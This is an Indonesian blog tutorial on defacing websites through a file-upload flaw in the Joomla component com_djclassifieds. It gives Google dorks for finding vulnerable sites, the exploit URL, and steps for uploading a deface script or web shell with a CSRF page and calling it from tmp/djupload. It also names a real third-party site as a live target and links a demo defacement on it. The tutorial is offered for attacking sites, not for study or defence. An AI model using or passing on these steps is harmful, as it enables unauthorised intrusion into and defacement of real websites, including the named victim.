Tutorial Deface Metode com_djclassifieds File Upload.

Kali ini saya akan memberikan Cara Deface Metode com_djclassifieds File Upload. Pasti kalian bingung dengan konten saya? kenapa sih metode nya selalu ez atau sama semua? cuman beda nama nya aja? ya gapapa, yg penting buat nambah nambahin mirror ea:v

Kita gasken aja ea :3

Bahan Bahan Yang Kalian Perlukan :

• Hp/Pc 
• Internet
• Script Deface / Shell
• Tools CSRF : [Ambil disini]

Untuk Dork Nya : 
inurl:/com_djclassifieds
inurl:/components/com_djclassifieds

Exploit :
/index.php?option=com_djclassifieds&task=upload&tmpl=component

Step By Step :

1. Kalian dorking dulu di google.

2. Lalu pilih target dan masukkan Exploit nya.

3. Apa bila setelah kalian tambahkan Exploit nya. Jika {"jsonrpc" : "2.0", "result" : null, "id" : "id"} Atau tampilan Blank Biasanya Vuln.

4. Lalu buka CSRF yang sudah kalian download.

5. Lalu di bagian PASTEKAN DISINI SITE NYA ATAU PATH NYA. Nah itu di ganti dengan target kalian contoh razzerhacker.com.

Dan di bagian ( DISINI NAMA SC LU ) itu isi dengan nama sc kalian

Contoh value="v1.html"

6. Lalu kalian Save Ekstensi .html, dan buka lewat google.

7. Lalu Up sc kalian.

8. Nnti klo berhasil up sc kalian nnti ada bacaan {"jsonrpc" : "2.0", "result" : null, "id" : "id"} itu sama kaya di nomor 3 tapi kalo sebelum kita kunci target nya mana bsa di index atau di up kan sc kita.

9. Lalu kita panggil sc kita, Cara manggil sc nya gmna? mudah tinggal tambahkan ( tmp/djupload/Nama Di Value CSRF ) di akhir site.

Contoh : razzerhacker.com/tmp/djupload/Nama Di Value CSRF.html

10. Dan hasil nya?:v

Demo : https://www.paradisola.it/tmp/djupload/v1.html

Live Target : https://www.paradisola.it/index.php?option=com_djclassifieds&task=upload&tmpl=component


Kalo tidak paham kalian bisa chat saya ada tombol button wa di samping kiri.

Sekian artikel kali ini Tutorial Deface Metode com_djclassifieds File Upload. Apa bila ada kritik dan saran kalian bisa komen di bawah.

Ridwan_Kun

Anak nolep pecandu IT.

Bagikan Artikel ini